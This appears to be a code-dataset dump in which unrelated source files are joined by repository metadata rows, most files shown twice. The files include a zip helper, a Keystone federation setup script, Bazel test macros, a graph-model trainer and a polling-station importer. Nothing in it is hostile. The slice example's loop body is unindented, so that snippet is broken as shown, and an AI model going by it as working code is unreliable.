# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from io import BytesIO
from os import path, walk
from zipfile import ZipFile, ZIP_DEFLATED
from iconsdk.exception import ZipException
def gen_deploy_data_content(_path: str) -> bytes:
    """Generate bytes of zip data of SCORE.

    :param _path: Path of the directory to be zipped.
    :return: the in-memory zip archive as bytes
    :raise ValueError: if ``_path`` is neither a file nor a directory
    :raise ZipException: if the SCORE contents cannot be zipped
    """
    # reject anything that is neither an existing file nor a directory
    if not (path.isdir(_path) or path.isfile(_path)):
        raise ValueError(f"Invalid path {_path}")
    memory_zip = InMemoryZip()
    try:
        memory_zip.zip_in_memory(_path)
    except ZipException:
        raise ZipException(f"Can't zip SCORE contents")
    return memory_zip.data
class InMemoryZip:
    """Class for compressing data in memory using zip and BytesIO."""
    def __init__(self):
        # backing buffer that accumulates the zip archive bytes
        self._in_memory = BytesIO()
    @property
    def data(self) -> bytes:
        """Returns zip data

        :return: zip data
        """
        self._in_memory.seek(0)
        return self._in_memory.read()
    def zip_in_memory(self, _path: str):
        """Compress zip data (bytes) in memory.

        :param _path: The path of the directory (or existing zip file) to be zipped.
        """
        try:
            # when it is a zip file
            if path.isfile(_path):
                # validate the archive, then copy the raw file into the buffer
                zf = ZipFile(_path, 'r', ZIP_DEFLATED, False)
                zf.testzip()
                with open(_path, mode='rb') as fp:
                    fp.seek(0)
                    self._in_memory.seek(0)
                    self._in_memory.write(fp.read())
            else:
                # root path for figuring out directory of tests
                tmp_root = None
                with ZipFile(self._in_memory, 'a', ZIP_DEFLATED, False, compresslevel=9) as zf:
                    for root, folders, files in walk(_path):
                        # the package root is the directory holding package.json
                        if 'package.json' in files:
                            tmp_root = root
                        # skip the package's tests directory, caches and hidden entries
                        if tmp_root and root.replace(tmp_root,'') == '/tests':
                            continue
                        if root.find('__pycache__') != -1:
                            continue
                        if root.find('/.') != -1:
                            continue
                        for file in files:
                            if file.startswith('.'):
                                continue
                            full_path = path.join(root, file)
                            zf.write(full_path)
        except ZipException:
            raise ZipException
| 34 | 0 | 27 |
c21fb14af02a04b30a0dc5a0c0615136eac0e954 | 381 | py | Python | CH01_Algorithm_ADS/1.11.Naming_a_slice.py | Chang-Liu-TAMU/Python-Cookbook-reading | 7b974c32f77b4b3d7cfeed30d1671081057c566f | [
"MIT"
] | null | null | null | CH01_Algorithm_ADS/1.11.Naming_a_slice.py | Chang-Liu-TAMU/Python-Cookbook-reading | 7b974c32f77b4b3d7cfeed30d1671081057c566f | [
"MIT"
] | null | null | null | CH01_Algorithm_ADS/1.11.Naming_a_slice.py | Chang-Liu-TAMU/Python-Cookbook-reading | 7b974c32f77b4b3d7cfeed30d1671081057c566f | [
"MIT"
] | null | null | null | a = list(range(10))
slice1 = slice(0, 3)
slice2 = slice(4, 8)
print(a[slice1])
print(a[slice2])
a[slice2] = ["@", "#", "$", "%"]
print(a)
del a[slice1]
print(a)
print(f"slice start: {slice1.start}")
print(f"slice stop: {slice1.stop}")
print(f"slice step: {slice1.step}")
c = slice(0, 100, 3)
s = "0as0ef0df0vd0ef0d"
for i in range(*c.indices(len(s))):
print(s[i], end='')
| 17.318182 | 37 | 0.603675 | a = list(range(10))
slice1 = slice(0, 3)
slice2 = slice(4, 8)
print(a[slice1])
print(a[slice2])
a[slice2] = ["@", "#", "$", "%"]
print(a)
del a[slice1]
print(a)
print(f"slice start: {slice1.start}")
print(f"slice stop: {slice1.stop}")
print(f"slice step: {slice1.step}")
c = slice(0, 100, 3)
s = "0as0ef0df0vd0ef0d"
for i in range(*c.indices(len(s))):
print(s[i], end='')
| 0 | 0 | 0 |
d713f5b3fe1e13db25afe646381d31f344f05f8d | 2,293 | py | Python | provision/08-create-keystone-stuff.py | norcams/himlar-connect | 8d375953aa6747471d1b32cf3b8a7b1dd1a1adf4 | [
"Apache-2.0"
] | null | null | null | provision/08-create-keystone-stuff.py | norcams/himlar-connect | 8d375953aa6747471d1b32cf3b8a7b1dd1a1adf4 | [
"Apache-2.0"
] | 5 | 2015-12-10T07:48:20.000Z | 2016-03-16T09:44:42.000Z | provision/08-create-keystone-stuff.py | norcams/himlar-connect | 8d375953aa6747471d1b32cf3b8a7b1dd1a1adf4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import ConfigParser
import requests
import json
cp = ConfigParser.SafeConfigParser()
cp.read('/etc/keystone/keystone.conf')
token = cp.get('DEFAULT', 'admin_token')
baseurl = 'http://localhost:35357/v3/OS-FEDERATION'
headers = {
'X-Auth-Token': token,
'Content-Type': 'application/json',
}
with open('/opt/himlar/json/create-idp.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
response.raise_for_status()
resp = requests.get('http://localhost:35357/v3/domains', headers=headers)
domains = resp.json()['domains']
domain_id = None
for domain in domains:
if domain['name'] == u'connect':
domain_id = domain['id']
if not domain_id:
raise Exception('Did not find domain "connect"')
with open('/opt/himlar/json/create-mapping.json') as fh:
data = fh.read()
data = data.replace('CONNECT_DOMAIN_ID', domain_id)
response = requests.put(baseurl + '/mappings/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/mappings/dataporten',
headers=headers, data=data)
response.raise_for_status()
with open('/opt/himlar/json/create-protocol.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
response.raise_for_status()
data = {
'group': {
'description': 'Gruppe for test med dataporten',
'domain_id': domain_id,
'name': 'dataporten_group',
}
}
response = requests.post('http://localhost:35357/v3/groups',
headers=headers, data=json.dumps(data))
if response.status_code not in (201, 409):
raise Exception('Could not create group')
| 35.276923 | 92 | 0.63672 | #!/usr/bin/env python
import ConfigParser
import requests
import json
cp = ConfigParser.SafeConfigParser()
cp.read('/etc/keystone/keystone.conf')
token = cp.get('DEFAULT', 'admin_token')
baseurl = 'http://localhost:35357/v3/OS-FEDERATION'
headers = {
'X-Auth-Token': token,
'Content-Type': 'application/json',
}
with open('/opt/himlar/json/create-idp.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
response.raise_for_status()
resp = requests.get('http://localhost:35357/v3/domains', headers=headers)
domains = resp.json()['domains']
domain_id = None
for domain in domains:
if domain['name'] == u'connect':
domain_id = domain['id']
if not domain_id:
raise Exception('Did not find domain "connect"')
with open('/opt/himlar/json/create-mapping.json') as fh:
data = fh.read()
data = data.replace('CONNECT_DOMAIN_ID', domain_id)
response = requests.put(baseurl + '/mappings/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/mappings/dataporten',
headers=headers, data=data)
response.raise_for_status()
with open('/opt/himlar/json/create-protocol.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
response.raise_for_status()
data = {
'group': {
'description': 'Gruppe for test med dataporten',
'domain_id': domain_id,
'name': 'dataporten_group',
}
}
response = requests.post('http://localhost:35357/v3/groups',
headers=headers, data=json.dumps(data))
if response.status_code not in (201, 409):
raise Exception('Could not create group')
| 0 | 0 | 0 |
405a8cd18663f1cbb1ec07cd8a60a7e43de9624e | 650 | py | Python | model-optimizer/unit_tests/extensions/front/tf/concat_ext_test.py | monroid/openvino | 8272b3857ef5be0aaa8abbf7bd0d5d5615dc40b6 | [
"Apache-2.0"
] | 2,406 | 2020-04-22T15:47:54.000Z | 2022-03-31T10:27:37.000Z | model-optimizer/unit_tests/extensions/front/tf/concat_ext_test.py | thomas-yanxin/openvino | 031e998a15ec738c64cc2379d7f30fb73087c272 | [
"Apache-2.0"
] | 4,948 | 2020-04-22T15:12:39.000Z | 2022-03-31T18:45:42.000Z | model-optimizer/unit_tests/extensions/front/tf/concat_ext_test.py | thomas-yanxin/openvino | 031e998a15ec738c64cc2379d7f30fb73087c272 | [
"Apache-2.0"
] | 991 | 2020-04-23T18:21:09.000Z | 2022-03-31T18:40:57.000Z | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from extensions.front.tf.concat_ext import ConcatFrontExtractor
from unit_tests.utils.extractors import PB, BaseExtractorsTestingClass
| 29.545455 | 70 | 0.589231 | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from extensions.front.tf.concat_ext import ConcatFrontExtractor
from unit_tests.utils.extractors import PB, BaseExtractorsTestingClass
class ConcatExtractorTest(BaseExtractorsTestingClass):
def test_concat(self):
node = PB({'pb': PB({'attr': {'N': PB({'i': 4})}})})
self.expected = {
'N': 4,
'simple_concat': True,
'type': 'Concat',
'op': 'Concat',
'kind': 'op',
'axis': 1
}
ConcatFrontExtractor.extract(node)
self.res = node
self.compare()
| 349 | 33 | 49 |
de2ba11bf8bbd61c7fd9256c51e91542ed514075 | 4,034 | bzl | Python | tools/project/build_defs.bzl | TokTok/toktok-stack | fe60e13d42d2b45e13ea4a9448a49925bc6a6d89 | [
"CNRI-Python",
"AML",
"Xnet",
"Linux-OpenIB",
"X11"
] | 12 | 2016-10-16T09:36:50.000Z | 2021-12-02T03:59:24.000Z | tools/project/build_defs.bzl | TokTok/toktok-stack | fe60e13d42d2b45e13ea4a9448a49925bc6a6d89 | [
"CNRI-Python",
"AML",
"Xnet",
"Linux-OpenIB",
"X11"
] | 218 | 2016-12-31T23:35:51.000Z | 2022-03-30T15:55:07.000Z | tools/project/build_defs.bzl | TokTok/toktok-stack | fe60e13d42d2b45e13ea4a9448a49925bc6a6d89 | [
"CNRI-Python",
"AML",
"Xnet",
"Linux-OpenIB",
"X11"
] | 6 | 2016-09-20T12:43:36.000Z | 2021-08-06T17:39:52.000Z | """Defines a project macro used in every TokTok sub-project.
It checks constraints such as the use of the correct license and the presence
and correctness of the license text.
"""
_haskell_travis = rule(
attrs = {
"package": attr.string(mandatory = True),
"_template": attr.label(
default = Label("//tools/project:haskell_travis.yml.in"),
allow_single_file = True,
),
},
outputs = {"source_file": ".travis-expected.yml"},
implementation = _haskell_travis_impl,
)
def project(license = "gpl3", standard_travis = False):
"""Adds some checks to make sure the project is uniform."""
native.sh_test(
name = "license_test",
size = "small",
srcs = ["//tools/project:diff_test.sh"],
args = [
"$(location LICENSE)",
"$(location //tools:LICENSE.%s)" % license,
],
data = [
"LICENSE",
"//tools:LICENSE.%s" % license,
],
)
native.sh_test(
name = "readme_test",
size = "small",
srcs = ["//tools/project:readme_test.sh"],
args = ["$(location README.md)"],
data = ["README.md"],
)
native.sh_test(
name = "settings_test",
size = "small",
srcs = ["//tools/project:settings_test.sh"],
args = [
"$(location .github/settings.yml)",
# qTox is an exception. Maybe we should rename the submodule?
"qTox" if native.package_name() == "qtox" else native.package_name().replace("_", "-"),
],
data = [".github/settings.yml"],
)
if (native.package_name().startswith("hs-") and
any([f for f in native.glob(["*"]) if f.endswith(".cabal")])):
_haskell_project(
standard_travis = standard_travis,
)
| 27.256757 | 99 | 0.515865 | """Defines a project macro used in every TokTok sub-project.
It checks constraints such as the use of the correct license and the presence
and correctness of the license text.
"""
def _haskell_travis_impl(ctx):
ctx.actions.expand_template(
template = ctx.file._template,
output = ctx.outputs.source_file,
substitutions = {
"{PACKAGE}": ctx.attr.package,
},
)
outs = [ctx.outputs.source_file]
return DefaultInfo(files = depset(outs), runfiles = ctx.runfiles(files = outs))
_haskell_travis = rule(
attrs = {
"package": attr.string(mandatory = True),
"_template": attr.label(
default = Label("//tools/project:haskell_travis.yml.in"),
allow_single_file = True,
),
},
outputs = {"source_file": ".travis-expected.yml"},
implementation = _haskell_travis_impl,
)
def _haskell_project(standard_travis = True):
haskell_package = native.package_name()[3:]
cabal_file = haskell_package + ".cabal"
native.sh_test(
name = "cabal_test",
size = "small",
srcs = ["//tools/project:cabal_test.py"],
args = [
"$(location BUILD.bazel)",
"$(location %s)" % cabal_file,
],
data = [
"BUILD.bazel",
cabal_file,
],
)
if standard_travis:
_haskell_travis(
name = "travis",
package = haskell_package,
)
native.sh_test(
name = "travis_test",
size = "small",
srcs = ["//tools/project:diff_test.sh"],
data = [
".travis.yml",
":travis",
],
args = [
"$(location .travis.yml)",
"$(location :travis)",
],
)
def project(license = "gpl3", standard_travis = False):
"""Adds some checks to make sure the project is uniform."""
native.sh_test(
name = "license_test",
size = "small",
srcs = ["//tools/project:diff_test.sh"],
args = [
"$(location LICENSE)",
"$(location //tools:LICENSE.%s)" % license,
],
data = [
"LICENSE",
"//tools:LICENSE.%s" % license,
],
)
native.sh_test(
name = "readme_test",
size = "small",
srcs = ["//tools/project:readme_test.sh"],
args = ["$(location README.md)"],
data = ["README.md"],
)
native.sh_test(
name = "settings_test",
size = "small",
srcs = ["//tools/project:settings_test.sh"],
args = [
"$(location .github/settings.yml)",
# qTox is an exception. Maybe we should rename the submodule?
"qTox" if native.package_name() == "qtox" else native.package_name().replace("_", "-"),
],
data = [".github/settings.yml"],
)
if (native.package_name().startswith("hs-") and
any([f for f in native.glob(["*"]) if f.endswith(".cabal")])):
_haskell_project(
standard_travis = standard_travis,
)
def workspace(projects):
native.sh_test(
name = "git_modules_test",
size = "small",
srcs = [":git_modules_test.pl"],
args = [
"$(location gitmodules)",
"$(location git-remotes)",
] + projects,
data = [
"gitmodules",
"git-remotes",
],
)
native.test_suite(
name = "license_tests",
tests = ["//%s:license_test" % p for p in projects],
)
native.test_suite(
name = "readme_tests",
tests = ["//%s:readme_test" % p for p in projects],
)
native.test_suite(
name = "settings_tests",
tests = ["//%s:settings_test" % p for p in projects],
)
native.test_suite(
name = "workspace_tests",
tests = [
":license_tests",
":readme_tests",
":settings_tests",
],
)
| 2,133 | 0 | 69 |
242e324ff0c40c3ccd9b5370c481cb686b1eb1e8 | 7,658 | py | Python | daydayup_submit/model.py | daydayupPro/KDDCup2020_AutoGraph | 9ce2e6ecec50c4a6f99d832cd5f8370fe985a519 | [
"MIT"
] | 1 | 2020-06-16T00:03:50.000Z | 2020-06-16T00:03:50.000Z | daydayup_submit/model.py | daydayupPro/KDDCup2020_AutoGraph | 9ce2e6ecec50c4a6f99d832cd5f8370fe985a519 | [
"MIT"
] | 2 | 2020-06-16T00:05:46.000Z | 2020-11-10T11:17:17.000Z | daydayup_submit/model.py | daydayupPro/KDDCup2020_AutoGraph | 9ce2e6ecec50c4a6f99d832cd5f8370fe985a519 | [
"MIT"
] | 4 | 2020-06-11T07:17:11.000Z | 2020-06-16T00:05:50.000Z | """the simple baseline for autograph"""
import numpy as np
import pandas as pd
import torch
import torch.nn.functional as F
from torch.nn import Linear
from torch_geometric.nn import GCNConv, JumpingKnowledge
from torch_geometric.data import Data
from torch_geometric.nn import Node2Vec
from torch.utils.data import DataLoader
import networkx as nx
import random
from collections import Counter
from utils import normalize_features
import scipy.sparse as sp
from appnp import APPNPTrainer
from daydayup_model import GCNTrainer, TAGTrainer, XGBTrainer
from scipy import stats
from sklearn import preprocessing
import warnings
warnings.filterwarnings("ignore")
from daydayup_private_features import dayday_feature, dayday_feature_old
fix_seed(1234)
| 36.122642 | 217 | 0.57391 | """the simple baseline for autograph"""
import numpy as np
import pandas as pd
import torch
import torch.nn.functional as F
from torch.nn import Linear
from torch_geometric.nn import GCNConv, JumpingKnowledge
from torch_geometric.data import Data
from torch_geometric.nn import Node2Vec
from torch.utils.data import DataLoader
import networkx as nx
import random
from collections import Counter
from utils import normalize_features
import scipy.sparse as sp
from appnp import APPNPTrainer
from daydayup_model import GCNTrainer, TAGTrainer, XGBTrainer
from scipy import stats
from sklearn import preprocessing
import warnings
warnings.filterwarnings("ignore")
from daydayup_private_features import dayday_feature, dayday_feature_old
def fix_seed(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
fix_seed(1234)
class Model:
def __init__(self):
self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
def generate_pyg_data_appnp(self, data, x, edge_index):
graph = nx.from_edgelist(edge_index)
features= normalize_features(x)
num_nodes = features.shape[0]
target = np.zeros(num_nodes, dtype=np.long)
inds = data['train_label'][['node_index']].to_numpy()
train_y = data['train_label'][['label']].to_numpy()
target[inds] = train_y
train_indices = data['train_indices']
test_indices = data['test_indices']
return graph, features, target, train_indices, test_indices
def generate_pyg_data_gcn(self, data, x, edge_index):
x = torch.tensor(x, dtype=torch.float)
edge_index = torch.tensor(edge_index, dtype=torch.long).transpose(0, 1)
edge_weight = data['edge_file']['edge_weight'].to_numpy()
edge_weight = torch.tensor(edge_weight, dtype=torch.float32)
num_nodes = x.size(0)
y = torch.zeros(num_nodes, dtype=torch.long)
inds = data['train_label'][['node_index']].to_numpy()
train_y = data['train_label'][['label']].to_numpy()
y[inds] = torch.tensor(train_y, dtype=torch.long)
train_indices = data['train_indices']
test_indices = data['test_indices']
data = Data(x=x, edge_index=edge_index, y=y, edge_weight=edge_weight)
data.num_nodes = num_nodes
train_mask = torch.zeros(num_nodes, dtype=torch.bool)
train_mask[train_indices] = 1
data.train_mask = train_mask
test_mask = torch.zeros(num_nodes, dtype=torch.bool)
test_mask[test_indices] = 1
data.test_mask = test_mask
return data
def train_predict(self, data, time_budget, n_class, schema):
flag_feature = 1
sp_density = 0.0
flag_zero = 1
x = data['fea_table']
if x.shape[1] == 1:
x = x.to_numpy()
x = x.reshape(x.shape[0])
x = np.array(pd.get_dummies(x), dtype=np.float)
flag_feature = 0
else:
x.replace([np.inf, -np.inf], np.nan, inplace=True)
x.fillna(0, inplace=True)
x = x.drop('node_index', axis=1).to_numpy()
x_max = x.max()
x_min = x.min()
if x_max == x_min:
x = np.arange(x.shape[0])
x = np.array(pd.get_dummies(x), dtype=np.float)
flag_zero = 0
else:
sp_density = np.count_nonzero(x)/x.size*1.
x = x.astype(np.float)
label_counter = Counter(data['train_label']['label'])
label_most_common_1 = label_counter.most_common(1)[0][0]
label_len = len(label_counter)
df = data['edge_file']
edge_count = df.shape[0]
edge_index = df[['src_idx', 'dst_idx']].to_numpy()
edge_index = sorted(edge_index, key=lambda d: d[0])
if sp_density >= 0.1:
data = self.generate_pyg_data_gcn(data, x, edge_index)
lr_lst = [0.005, 0.005, 0.005, 0.005, 0.005]
my_epochs = 700
pred = []
if all([edge_count >= 4e5, edge_count <= 7e5]):
my_epochs = 500
elif all([edge_count > 7e5, edge_count < 15e5]):
lr_lst = [0.005, 0.005, 0.005]
my_epochs = 400
elif edge_count >= 15e5:
lr_lst = [0.005]
my_epochs = 500
for lr in lr_lst:
trainer = GCNTrainer(data, lr=lr, weight_decay=2e-4, epochs=my_epochs)
temp = trainer.train_nn()
pred.append(temp)
pred = stats.mode(pred)[0][0]
elif all([flag_feature == 0, label_len<=3]):
data = self.generate_pyg_data_gcn(data, x, edge_index)
try:
my_epochs = 500
if edge_count >= 14e5:
my_epochs = 400
trainer = TAGTrainer(data, lr=0.018, weight_decay=2e-4, epochs=my_epochs, hidden=16, dropout=0.5)
pred = trainer.train_nn()
except:
lr_lst = [0.005, 0.005, 0.005, 0.005, 0.005]
my_epochs = 700
pred = []
if all([edge_count >= 4e5, edge_count <= 7e5]):
my_epochs = 500
elif all([edge_count > 7e5, edge_count < 15e5]):
lr_lst = [0.005, 0.005, 0.005]
my_epochs = 400
elif edge_count >= 15e5:
lr_lst = [0.005]
my_epochs = 500
for lr in lr_lst:
trainer = GCNTrainer(data, lr=lr, weight_decay=2e-4, epochs=my_epochs)
temp = trainer.train_nn()
pred.append(temp)
pred = stats.mode(pred)[0][0]
elif all([flag_feature == 0, label_len>3]):
print("you are best")
train_indices=data['train_indices']
test_indices=data['test_indices']
feature_neighbor = dayday_feature_old(data)
train_y = data['train_label']['label'].to_numpy()
train_x = feature_neighbor[train_indices]
test_x = feature_neighbor[test_indices]
trainer = XGBTrainer(train_x, train_y, test_x, n_class, max_depth=6, subsample=0.7, colsample_bytree=0.7, random_state=0, n_jobs=3)
pred = trainer.train_nn()
elif flag_zero == 0:
train_indices=data['train_indices']
test_indices=data['test_indices']
feature_neighbor = dayday_feature(data, n_class=n_class, label_most_common_1=label_most_common_1)
train_y = data['train_label']['label'].to_numpy()
train_x = feature_neighbor[train_indices]
test_x = feature_neighbor[test_indices]
trainer = XGBTrainer(train_x, train_y, test_x, n_class, n_jobs=3)
pred = trainer.train_nn()
else:
graph, features, target, train_mask, test_mask = self.generate_pyg_data_appnp(data, x, edge_index)
trainer = APPNPTrainer(graph, features, target, train_mask, test_mask, sp_density, learning_rate=0.012, lambd=2.5e-3, epochs=600, model_name="exact", iterations=5, alpha=0.31, layers=[64,64], dropout=0.6)
pred = trainer.train_neural_network()
return pred
| 6,701 | -9 | 166 |
545bdc14f39b8de2b64e34671f1d58d8fef59fff | 5,175 | py | Python | polling_stations/apps/data_importers/management/commands/import_bolton.py | zuzak/UK-Polling-Stations | bddfd52ad5da09d6310c8e72c9646bed2add2578 | [
"BSD-3-Clause"
] | null | null | null | polling_stations/apps/data_importers/management/commands/import_bolton.py | zuzak/UK-Polling-Stations | bddfd52ad5da09d6310c8e72c9646bed2add2578 | [
"BSD-3-Clause"
] | 364 | 2020-10-19T07:16:41.000Z | 2022-03-31T06:10:55.000Z | polling_stations/apps/data_importers/management/commands/import_bolton.py | zuzak/UK-Polling-Stations | bddfd52ad5da09d6310c8e72c9646bed2add2578 | [
"BSD-3-Clause"
] | null | null | null | from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
| 55.053191 | 119 | 0.622802 | from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "E08000001"
addresses_name = (
"parl.2019-12-12/Version 1/Democracy_Club__12December2019Bolton.CSV"
)
stations_name = "parl.2019-12-12/Version 1/Democracy_Club__12December2019Bolton.CSV"
elections = ["parl.2019-12-12"]
allow_station_point_from_postcode = False
def station_record_to_dict(self, record):
if record.polling_place_id == "3670":
# Trinity Methodist Hall (postcode geocode puts this quite away from actual location, making error spotting
# more difficult)
record = record._replace(
polling_place_easting=374156, polling_place_northing=405696
)
return super().station_record_to_dict(record)
def address_record_to_dict(self, record):
if record.property_urn == "10001244221":
record = record._replace(property_urn="", post_code="BL1 4JU")
rec = super().address_record_to_dict(record)
uprn = record.property_urn.strip().lstrip("0")
if record.addressline6.strip() == "BL7 OHR":
rec["postcode"] = "BL7 0HR"
if record.addressline6.strip() == "BL4 ONX":
rec["postcode"] = "BL4 0NX"
if record.addressline6.strip() == "BL4 ONY":
rec["postcode"] = "BL4 0NY"
if uprn == "100010854762":
rec["postcode"] = "BL3 4BG"
if uprn in ["100010864955", "100010864956"]:
rec["postcode"] = "BL5 3QW"
if record.addressline6.strip() in ("BL4 9AJ",):
return None
if record.addressline1.endswith(" The Hollins Halls of Residence"):
# Postcode wrong in AddressBase, according to the web
rec["accept_suggestion"] = False
if uprn in [
"100010900195", # BL24JU -> BL23JL : 32 Longsight Lane, Harwood, Bolton, Lancs
"100010900196", # BL24JU -> BL23JR : The Bungalow, 33 Longsight Lane, Harwood, Bolton, Lancs
"100010900240", # BL24JU -> BL24BA : 215 Longsight Lane, Harwood, Bolton, Lancs
"100012432800", # BL24JU -> BL24LB : Hawthorne Cottage, Longsight Lane, Harwood, Bolton, Lancs
"100012432803", # BL24JU -> BL24JX : Longworth Manor, Longsight Lane, Harwood, Bolton, Lancs
"200002549966", # BL23BQ -> BL24BQ : 105 Lea Gate, Bradshaw, Bolton, Lancs
"200002549967", # BL23BQ -> BL24BQ : 107 Lea Gate, Bradshaw, Bolton, Lancs
"100010930105", # BL24JA -> BL24HR : 85 Stitch-Mi-Lane, Harwood, Bolton, Lancs
"100010930106", # BL24JA -> BL24HR : 87 Stitch-Mi-Lane, Harwood, Bolton, Lancs
"100010922768", # BL52DL -> BL51DL : 101 Rutherford Drive, Over Hulton, Bolton, Lancs
"100012555302", # BL66PX -> BL17PX : Bob Smithy, 1450 & 1448 Chorley Old Road, Bolton, Lancs
"100010897318", # BL52JX -> BL52JZ : Ground Floor Flat, 300 Leigh Road, Westhoughton, Bolton, Lancs
]:
rec["accept_suggestion"] = True
if uprn in [
"10013876189", # BL17LA -> BL53DR : 1A Park Terrace, Bolton, Lancs
"100010922976", # BL49HG -> BL15LJ : 19 Norris Street, Farnworth, Bolton, Lancs
"100010922977", # BL49HG -> BL15LJ : 21 Norris Street, Farnworth, Bolton, Lancs
"100010922978", # BL49HG -> BL15LJ : 23 Norris Street, Farnworth, Bolton, Lancs
"10070921264", # BL79GX -> BL65LJ : 54 Clarendon Gardens, Bromley Cross, Bolton, Lancs
"10070920393", # BL79SZ -> BL25DR : 9 Bedford Street, Egerton, Bolton, Lancs
"10070923602", # BL22LA -> BL26BB : 398 Tonge Moor Road, Bolton, Lancs
"10070919948", # BL35QU -> BL24LL : First Floor, 333 Wigan Road, Bolton, Lancs
"100010865555", # BL15GJ -> BL34HY : 28 Clevelands Drive, Bolton, Lancs
"100010871529", # BL14SE -> BL35HH : 249 Spa Road, Bolton, Lancs
"100010868073", # BL47QX -> BL32LZ : 27 Darley Street, Farnworth, Bolton, Lancs
"100010873637", # BL13QW -> BL18DS : 35 Draycott Street, Bolton, Lancs
"10070920228", # BL47AT -> BL49PF : Flat 10 Alan Ball House, 89 Bolton Road, Farnworth, Bolton, Lancs
"100012558352", # BL33LB -> BL33JU : First Floor Flat, 187 Morris Green Lane, Bolton, Lancs
"100012558463", # BL33LB -> BL33JU : Ground Floor Flat, 187 Morris Green Lane, Bolton, Lancs
"100012431165", # BL47SL -> BL47SF : Cemetery Lodge, Cemetery Road, Kearsley, Bolton, Lancs
"100010863119", # BL15DP -> BL66JT : Flat Above, 543 Chorley New Road, Bolton, Lancs
"100010942100", # BL34QH -> BL52BS : 446 Wigan Road, Bolton, Lancs
"100010871458", # BL35HJ -> BL34EU : Flat 1, 352 Deane Road, Bolton, Lancs
"10001246600", # BL15PS -> BL15NH : 2 Markland Hill Lane, Bolton, Lancs
"100010901886", # BL32LS -> BL23JZ : Hardman Fold Lodge, 3 Lynwood Avenue, Bolton, Lancs
]:
rec["accept_suggestion"] = False
return rec
| 4,680 | 389 | 23 |
58c5d7e9701ddb6a19212520e727f15050de1fcc | 4,412 | py | Python | E2E/utility/utility_np.py | FrancescoMarra/E2E-ForgeryDetection | 352a788cdbe00184a6a29158c5c315a9832b326e | [
"BSD-4-Clause-UC"
] | 26 | 2020-04-10T13:25:12.000Z | 2022-03-20T12:27:02.000Z | E2E/utility/utility_np.py | FrancescoMarra/E2E-ForgeryDetection | 352a788cdbe00184a6a29158c5c315a9832b326e | [
"BSD-4-Clause-UC"
] | 10 | 2020-04-05T10:42:47.000Z | 2022-03-12T00:12:23.000Z | E2E/utility/utility_np.py | FrancescoMarra/E2E-ForgeryDetection | 352a788cdbe00184a6a29158c5c315a9832b326e | [
"BSD-4-Clause-UC"
] | 5 | 2020-04-05T10:44:36.000Z | 2022-03-29T06:41:03.000Z | # -*- coding: utf-8 -*-
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#
# Copyright (c) 2019 Image Processing Research Group of University Federico II of Naples ('GRIP-UNINA').
# All rights reserved.
# This work should only be used for nonprofit purposes.
#
# By downloading and/or using any of these files, you implicitly agree to all the
# terms of the license, as specified in the document LICENSE.md
# (included in this package) and online at
# http://www.grip.unina.it/download/LICENSE_OPEN.txt
#
import numpy as np
from skimage.util import view_as_blocks,view_as_windows
from math import floor
from scipy.interpolate import interp2d
from scipy.io import savemat
################################################
import matplotlib.pyplot as plt
| 36.46281 | 212 | 0.546464 | # -*- coding: utf-8 -*-
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#
# Copyright (c) 2019 Image Processing Research Group of University Federico II of Naples ('GRIP-UNINA').
# All rights reserved.
# This work should only be used for nonprofit purposes.
#
# By downloading and/or using any of these files, you implicitly agree to all the
# terms of the license, as specified in the document LICENSE.md
# (included in this package) and online at
# http://www.grip.unina.it/download/LICENSE_OPEN.txt
#
import numpy as np
from skimage.util import view_as_blocks,view_as_windows
from math import floor
from scipy.interpolate import interp2d
from scipy.io import savemat
################################################
import matplotlib.pyplot as plt
def np_im2patch(im, pShape,pStride=None):
if np.isscalar(pShape):
pShape = (pShape, pShape)
if pStride is None:
pStride = (pShape, pShape)
if np.isscalar(pStride):
pStride = (pStride, pStride)
imShape = im.shape
if im.ndim == 3:
if imShape[2] == 1:
im = im.squeeze()
elif len(pShape) == 2:
pShape = (pShape[0], pShape[1], imShape[2])
pStride = (pStride[0], pStride[1], imShape[2])
pad = np.array( np.add( np.multiply ( np.ceil( np.divide( np.subtract( imShape, np.subtract(pShape, pStride) ) , pStride, dtype=np.float) ),pStride), np.subtract(pShape, pStride)) - imShape,dtype=np.int)
pad = pad[0:2]
assert((pad >= 0).all())
if pad.sum() == 0:
p = view_as_windows(im, pShape,pStride)
